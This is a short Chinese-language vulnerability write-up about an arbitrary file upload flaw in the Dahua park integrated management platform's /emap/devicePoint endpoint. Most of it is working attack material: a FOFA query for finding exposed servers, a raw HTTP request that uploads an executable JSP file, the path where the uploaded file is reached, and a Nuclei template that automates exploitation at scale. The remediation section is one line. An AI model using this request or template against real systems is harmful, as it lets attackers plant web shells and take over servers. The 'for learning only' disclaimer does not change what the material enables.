免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
大华园区综合管理平台可能是一个集成多种管理功能的平台,例如安全监控、设备管理、人员管理等。这样的平台通常有助于提高园区运营效率和安全性。
大华园区综合管理平台/emap/devicePoint接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷
Ⅱ、fofa语句
body="/WPMS/asset/lib/gridster/"
Ⅲ、漏洞复现
POC
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="ceshi.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
1、构建poc
2、文件上传后,端口重定向到8314
http://127.0.0.1:8314/upload/emap/society_new/ico_res_c2c0a12203d2_on.jsp
Ⅳ、Nuclei-POC
id: Dahua-emap-devicePoint-uploadfile
info:
name: 大华园区综合管理平台/emap/devicePoint接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷
author: WLF
severity: high
metadata:
fofa-query: body="/WPMS/asset/lib/gridster/"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="{{filename}}.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
extractors:
- type: json #类型为json
part: body # 提取的位置
json:
- .data
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"jsp","data")
Ⅴ、修复建议
做好访问控制策略